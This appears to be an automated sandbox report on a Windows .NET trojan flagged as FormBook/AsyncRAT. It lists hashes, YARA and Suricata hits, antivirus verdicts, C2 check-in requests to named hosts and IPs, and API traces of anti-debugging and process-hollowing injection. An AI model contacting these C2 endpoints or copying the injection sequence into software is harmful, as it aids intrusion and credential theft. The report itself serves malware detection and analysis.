popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

UUQf0owhn8UWJCz.exe

Generic Malware PWS AntiDebug PE File PE32 .NET EXE AntiVM
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 7, 2021, 9:42 a.m. Nov. 7, 2021, 9:50 a.m.
Size 438.5KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 5917d602f423946e08474241e6a731a7
SHA256 e86bb6d494e6720f0eaecd5a18c8e7c55324a1a301c5111f98a94d82fe295574
CRC32 875955B9
ssdeep 12288:tpLZMkQu6UkvCkjiUKZPfCk4Z37Cz6M07kuG118k1LLgAe:tpLZMk3lkvC8OQZF7zG18k3s
Yara
  • PE_Header_Zero - PE File Signature
  • Generic_Malware_Zero - Generic Malware
  • IsPE32 - (no description)
  • Is_DotNET_EXE - (no description)
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49166 -> 46.252.152.130:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 46.252.152.130:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49166 -> 46.252.152.130:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49164 -> 199.188.206.146:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49164 -> 199.188.206.146:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49164 -> 199.188.206.146:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 34.80.190.141:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 34.80.190.141:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49165 -> 34.80.190.141:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 198.54.117.216:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 198.54.117.216:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.103:49167 -> 198.54.117.216:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header suspicious_request GET http://www.ranbix.com/noha/?ML3p=WqlLRyxmklHBR9bvDjAAjeD09IEXqdmYERcw+cExScONqRgH/+tJNETkvgWEj3p7qMAbvI1j&t8o=FrFLaXd
suspicious_features GET method with no useragent header suspicious_request GET http://www.overseaspoolservice.com/noha/?ML3p=M+DGWJWziq67KtkkSsXl3bSbfh2dDaXu2IQ75uBlbdJS0aUvllJuJ1UEsSNpguwNrUAivjLX&t8o=FrFLaXd
suspicious_features GET method with no useragent header suspicious_request GET http://www.apocalyptoapertureserrature.net/noha/?ML3p=oktAv2LhUy86NFSiEbP+8ZjihMhV6NpBC9IoSL22dAOgFjsOiWhr4Snex0+MO9aHyMlhDMIV&t8o=FrFLaXd
suspicious_features GET method with no useragent header suspicious_request GET http://www.paddlercentral.com/noha/?ML3p=BflZB6OqREwGJlb9Sk842/jtcaZ5fuiyOju/J2yjGs5y9yumeUh4rkZlJ2CmfPQeRsVHYWsh&t8o=FrFLaXd
request GET http://www.ranbix.com/noha/?ML3p=WqlLRyxmklHBR9bvDjAAjeD09IEXqdmYERcw+cExScONqRgH/+tJNETkvgWEj3p7qMAbvI1j&t8o=FrFLaXd
request GET http://www.overseaspoolservice.com/noha/?ML3p=M+DGWJWziq67KtkkSsXl3bSbfh2dDaXu2IQ75uBlbdJS0aUvllJuJ1UEsSNpguwNrUAivjLX&t8o=FrFLaXd
request GET http://www.apocalyptoapertureserrature.net/noha/?ML3p=oktAv2LhUy86NFSiEbP+8ZjihMhV6NpBC9IoSL22dAOgFjsOiWhr4Snex0+MO9aHyMlhDMIV&t8o=FrFLaXd
request GET http://www.paddlercentral.com/noha/?ML3p=BflZB6OqREwGJlb9Sk842/jtcaZ5fuiyOju/J2yjGs5y9yumeUh4rkZlJ2CmfPQeRsVHYWsh&t8o=FrFLaXd
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a80000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2308
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2308
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73942000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02210000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00412000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00545000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0054b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00547000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0053a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00537000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00536000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0042d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x009dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05340000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 20480
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05341000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05346000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05347000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05348000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2308
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05349000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00a80000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
section {u'size_of_data': u'0x0006d000', u'virtual_address': u'0x00002000', u'entropy': 7.81434340078616, u'name': u'.text', u'virtual_size': u'0x0006cf74'} entropy 7.81434340079 description A section with a high entropy has been found
entropy 0.995433789954 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000238
1 0 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZERèXƒè ‹ÈƒÀ<‹ÁƒÀ(ÿᐸº´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"šúHuQH"šÏH:QH"šÌH8QHRich9QHPEL™OGà  |Ô@@.text¬{| `
base_address: 0x00400000
process_identifier: 2652
process_handle: 0x00000238
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2652
process_handle: 0x00000238
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZERèXƒè ‹ÈƒÀ<‹ÁƒÀ(ÿᐸº´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"šúHuQH"šÏH:QH"šÌH8QHRich9QHPEL™OGà  |Ô@@.text¬{| `
base_address: 0x00400000
process_identifier: 2652
process_handle: 0x00000238
1 1 0
Process injection Process 2308 called NtSetContextThread to modify thread in remote process 2652
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4314256
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000023c
process_identifier: 2652
1 0 0
Process injection Process 2308 resumed a thread in remote process 2652
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x0000023c
suspend_count: 1
process_identifier: 2652
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2308
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2308
1 0 0

NtResumeThread

 thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2308
1 0 0

CreateProcessInternalW

 thread_identifier: 2656
thread_handle: 0x0000023c
process_identifier: 2652
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\UUQf0owhn8UWJCz.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\UUQf0owhn8UWJCz.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000238
1 1 0

NtGetContextThread

 thread_handle: 0x0000023c
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000238
1 0 0

WriteProcessMemory

 buffer: MZERèXƒè ‹ÈƒÀ<‹ÁƒÀ(ÿᐸº´ Í!¸LÍ!This program cannot be run in DOS mode. $}f?9QH9QH9QH"šúHuQH"šÏH:QH"šÌH8QHRich9QHPEL™OGà  |Ô@@.text¬{| `
base_address: 0x00400000
process_identifier: 2652
process_handle: 0x00000238
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 2652
process_handle: 0x00000238
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2652
process_handle: 0x00000238
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4314256
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000023c
process_identifier: 2652
1 0 0

NtResumeThread

 thread_handle: 0x0000023c
suspend_count: 1
process_identifier: 2652
1 0 0
Lionic Trojan.MSIL.Noon.l!c
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Razy.987962
FireEye Gen:Variant.Razy.987962
McAfee RDN/Generic PWS.y
Cylance Unsafe
Sangfor Trojan.MSIL.Noon.gen
K7AntiVirus Trojan ( 00589f641 )
Alibaba Trojan:Win32/Kryptik.ali2000016
K7GW Trojan ( 00589f641 )
BitDefenderTheta Gen:NN.ZemsilF.34266.Bm0@ae@hD6
Cyren W32/MSIL_Kryptik.GAY.gen!Eldorado
Symantec Trojan.Gen.9
ESET-NOD32 a variant of MSIL/Kryptik.ADJU
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Spy.MSIL.Noon.gen
BitDefender Gen:Variant.Razy.987962
Avast Win32:CrypterX-gen [Trj]
Ad-Aware Gen:Variant.Razy.987962
Sophos Mal/Generic-S
TrendMicro TROJ_GEN.R002C0WK521
McAfee-GW-Edition BehavesLike.Win32.Fareit.gc
Emsisoft Gen:Variant.Razy.987962 (B)
Ikarus Trojan.MSIL.Crypt
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Arcabit Trojan.Razy.DF133A
GData MSIL.Trojan.PSE.IB4YD3
Cynet Malicious (score: 100)
AhnLab-V3 Trojan/Win.AgentTesla.C4753953
ALYac Gen:Variant.Razy.987962
MAX malware (ai score=100)
Malwarebytes Trojan.MalPack
TrendMicro-HouseCall TROJ_GEN.R002C0WK521
SentinelOne Static AI - Malicious PE
Fortinet MSIL/GenKryptik.FNAJ!tr
AVG Win32:CrypterX-gen [Trj]
Panda Trj/GdSda.A
CrowdStrike win/malicious_confidence_90% (W)
MaxSecure Trojan.Malware.300983.susgen